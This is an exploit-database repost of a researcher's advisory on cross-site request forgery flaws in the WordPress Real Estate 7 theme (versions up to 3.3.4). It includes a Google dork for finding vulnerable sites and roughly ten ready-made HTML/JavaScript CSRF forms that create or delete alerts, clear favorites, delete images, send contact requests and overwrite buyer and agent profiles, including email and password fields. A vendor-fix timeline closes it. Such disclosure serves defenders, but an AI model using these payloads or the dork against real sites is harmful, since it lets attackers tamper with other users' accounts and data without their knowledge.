0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Real Estate 7 Theme 3.3.4 Cross Site Request Forgery Vulnerability
[==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==
Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities
Google Dork: inurl:/wp-content/themes/realestate-7/
Research Date: 2023-02-10
Researcher: FearZzZz [ https://fearzzzz.ru ]
Component Vendor: Contempo Themes [ https://contempothemes.com ]
Vulnerable Version: <= 3.3.4
Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
CVSS Base Score: 6.3 (Medium)
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
OWASP Top 10: A01: 2021 – Broken Access Control
CWE: CWE-352
CVE: TBA
=================================================================================================
#### [ Description: ]
The Real Estate 7 theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v3.3.4, because of missing and incorrect nonce validation on several functions. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.
#### [ Impact: ]
Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.
#### [ Proof-of-Concept | Lead Alert Creation: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ct_email_cron_onoff" />
<input type="hidden" name="esetting" value="onsms" />
<input type="hidden" name="id" value="12" />
<input type="hidden" name="author_id" value="22" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Add Property to Favorites: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/our-properties/our-exclusive-listings/">
<input type="hidden" name="wpfpaction" value="add" />
<input type="hidden" name="postid" value="1005" />
<input type="hidden" name="ajax" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Remove Property from Favorites: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/favorite-listings/">
<input type="hidden" name="wpfpaction" value="remove" />
<input type="hidden" name="page" value="1" />
<input type="hidden" name="postid" value="451" />
<input type="hidden" name="ajax" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Contact / Information Request: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST">
<input type="hidden" name="ctsubject" value="Fear is Big Business" />
<input type="hidden" name="name" value="FearZzZz" />
<input type="hidden" name="email" value="fearzzzz@tutanota.com" />
<input type="hidden" name="ctphone" value="no" />
<input type="hidden" name="message" value="Fear is Big Business" />
<input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />
<input type="hidden" name="ctproperty" value="https://fearzzzz.ru" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST">
<input type="hidden" name="listing_id" value="451" />
<input type="hidden" name="ctsubject" value="Fear is Big Business" />
<input type="hidden" name="name" value="FearZzZz" />
<input type="hidden" name="email" value="fearzzzz@tutanota.com" />
<input type="hidden" name="ctphone" value="" />
<input type="hidden" name="message" value="Fear is Big Business" />
<input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />
<input type="hidden" name="ctproperty" value="Z" />
<input type="hidden" name="ctlistingstreet" value="Z" />
<input type="hidden" name="ctlistingcity" value="Z" />
<input type="hidden" name="ctlistingstate" value="Z" />
<input type="hidden" name="ctlistingzip" value="Z" />
<input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" />
<input type="hidden" name="ctlistingprice" value="Z" />
<input type="hidden" name="ctlistingsqft" value="Z" />
<input type="hidden" name="ctlistingbeds" value="" />
<input type="hidden" name="ctlistingbaths" value="" />
<input type="hidden" name="ctlistinglotsize" value="" />
<input type="hidden" name="ctlistingmlsnumber" value="" />
<input type="hidden" name="ctlistingpropertytype" value="Detached" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Lead Alert Deletion: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ct_delete_search" />
<input type="hidden" name="property_id" value="12" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Profile Image Deletion: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ct_ajax_delete_profile_img" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Broker Logo Deletion: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ct_ajax_delete_broker_logo" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Clear All Favorites: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/favorite-listings/">
<input type="hidden" name="wpfpaction" value="clear" />
<input type="hidden" name="ajax" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Buyer Profile Update: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://fearzzzz.ru/account-settings/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="last_name" value="" />
<input type="hidden" name="nickname" value="fearzzzz" />
<input type="hidden" name="display_name" value="FearZzZz" />
<input type="hidden" name="email" value="fearzzzz@tutanota.com" />
<input type="hidden" name="user_url" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="pass1" value="" />
<input type="hidden" name="pass2" value="" />
<input type="hidden" name="twitterhandle" value="" />
<input type="hidden" name="facebookurl" value="" />
<input type="hidden" name="instagramurl" value="" />
<input type="hidden" name="linkedinurl" value="" />
<input type="hidden" name="youtubeurl" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="user_additional_phone_1" value="" />
<input type="hidden" name="user_additional_phone_2" value="" />
<input type="hidden" name="user_mailing_address" value="" />
<input type="hidden" name="updateuser" value="Update Profile" />
<input type="hidden" name="_wpnonce" value="0451" />
<input type="hidden" name="_wp_http_referer" value="/account-settings/" />
<input type="hidden" name="action" value="update-user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
#### [ Proof-of-Concept | Agent Profile Update: ]
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/fearzzzz.ru\/account-settings\/", true);
xhr.setRequestHeader("content-type", "multipart\/form-data; boundary=---------------------------333499251812319952534005853646");
xhr.withCredentials = true;
var body = "-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"Agent\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"Demo\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"nickname\"\r\n" +
"\r\n" +
"agent\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"display_name\"\r\n" +
"\r\n" +
"Demo Agent\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"agent@email.com\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"user_url\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"description\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"pass1\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"pass2\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"twitterhandle\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"facebookurl\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"instagramurl\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"linkedinurl\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"youtubeurl\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"1024000\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"ct_profile_img\"; filename=\"fearzzzz.jpg\"\r\n" +
"Content-Type: image/jpeg\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"mobile\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"user_additional_phone_1\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"user_additional_phone_2\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"user_mailing_address\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"fax\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"tagline\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"agentlicense\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"1024000\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"ct_broker_logo\"; filename=\"fearzzzz.jpg\"\r\n" +
"Content-Type: image/jpeg\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"brokeragename\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"brokeragelicense\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"office\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"address\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"city\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"state\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"postalcode\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"updateuser\"\r\n" +
"\r\n" +
"Update Profile\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
"\r\n" +
"0451\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
"\r\n" +
"/account-settings/\r\n" +
"-----------------------------333499251812319952534005853646\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"update-user\r\n" +
"-----------------------------333499251812319952534005853646--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
```
#### [ Timeline: ]
2023.02.08 - Real Estate 7 Theme v3.3.4 released.
2023.02.10 - Vulnerability has been discovered.
2023.02.15 - Vendor notified.
2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.
#### [ Contacts: ]
Website: fearzzzz.ru
Email: fearzzzz@tutanota.com
Twitter: https://twitter.com/fear_zzzz
Medium: https://fearzzzz.medium.com
GitHub: https://github.com/fearzzzz
YouTube: https://youtube.com/@fearzzzz
#### [ Notes: ]
Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.
# 0day.today [2024-11-14] #